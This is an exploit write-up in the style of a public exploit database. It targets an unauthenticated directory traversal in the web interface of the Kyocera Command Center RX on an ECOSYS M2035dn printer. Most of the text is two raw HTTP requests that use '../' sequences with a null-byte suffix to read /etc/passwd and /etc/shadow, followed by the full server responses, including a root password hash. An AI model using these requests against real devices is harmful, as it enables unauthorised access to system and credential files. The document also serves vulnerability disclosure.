# Exploit Title: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated)
# Author: Luis Martinez
# Discovery Date: 2022-02-10
# Vendor Homepage: https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html
# Tested Version: ECOSYS M2035dn
# Tested on: Linux
# Vulnerability Type: Directory Traversal File Disclosure (Unauthenticated)
# Proof of Concept:
# 1.- Create a directory traversal payload
# 2.- Add nullbyte to the end of the payload(%00)
# 3.- Sent your request
Request 1:
GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1
Cookie: rtl=0
Host: X.X.X.X
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
Accept: */*
Response 1:
HTTP/1.1 200 OK
Content-Length: 844
Upgrade: TLS/1.0
Accept-Encoding: identity
Date: Thu, 10 Feb 2022 15:55:57 GMT
Server: KM-MFP-http/V0.0.1
Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT
ETag: "/js/../../../../../../../../etc/passwd, Thu, 10 Feb 2022 15:25:48 GMT"
Content-Type: image/jpeg
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
adm:x:4:4:adm:/var/adm:/bin/sh
lp:x:5:7:lp:/var/spool/lpd:/bin/sh
sync:x:6:8:sync:/bin:/bin/sync
shutdown:x:7:9:shutdown:/sbin:/sbin/shutdown
halt:x:8:10:halt:/sbin:/sbin/halt
mail:x:9:11:mail:/var/mail:/bin/sh
news:x:10:12:news:/var/spool/news:/bin/sh
uucp:x:11:13:uucp:/var/spool/uucp:/bin/sh
operator:x:12:0:operator:/root:/bin/sh
games:x:13:60:games:/usr/games:/bin/sh
ftp:x:15:14:ftp:/var/ftp:/bin/sh
man:x:16:20:man:/var/cache/man:/bin/sh
www:x:17:18:www-data:/var/www:/bin/sh
sshd:x:18:19:sshd:/var/run/sshd:/bin/sh
proxy:x:19:21:proxy:/bin:/bin/sh
telnetd:x:20:22:proxy:/bin:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
ais:x:101:101:ais:/var/run/ais:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
Request 2:
GET /js/../../../../../../../../etc/shadow%00.jpg HTTP/1.1
Cookie: rtl=0
Host: X.X.X.X
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
Accept: */*
Response 2:
HTTP/1.1 200 OK
Content-Length: 480
Upgrade: TLS/1.0
Accept-Encoding: identity
Date: Thu, 10 Feb 2022 16:10:16 GMT
Server: KM-MFP-http/V0.0.1
Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT
ETag: "/js/../../../../../../../../etc/shadow, Thu, 10 Feb 2022 15:25:48 GMT"
Content-Type: image/jpeg
root:$1$7NzW9Q4N$hXTtMygKjVUdJtW86EH3t1:15873::::::
bin:*:15873::::::
daemon:*:15873::::::
sys:*:15873::::::
adm:*:15873::::::
lp:*:15873::::::
sync:*:15873::::::
shutdown:*:15873::::::
halt:*:15873::::::
mail:*:15873::::::
news:*:15873::::::
uucp:*:15873::::::
operator:*:15873::::::
games:*:15873::::::
ftp:*:15873::::::
man:*:15873::::::
www:*:15873::::::
sshd:*:15873::::::
proxy:*:15873::::::
telnetd:*:15873::::::
backup:*:15873::::::
ais:*:15873::::::
nobody:*:15873::::::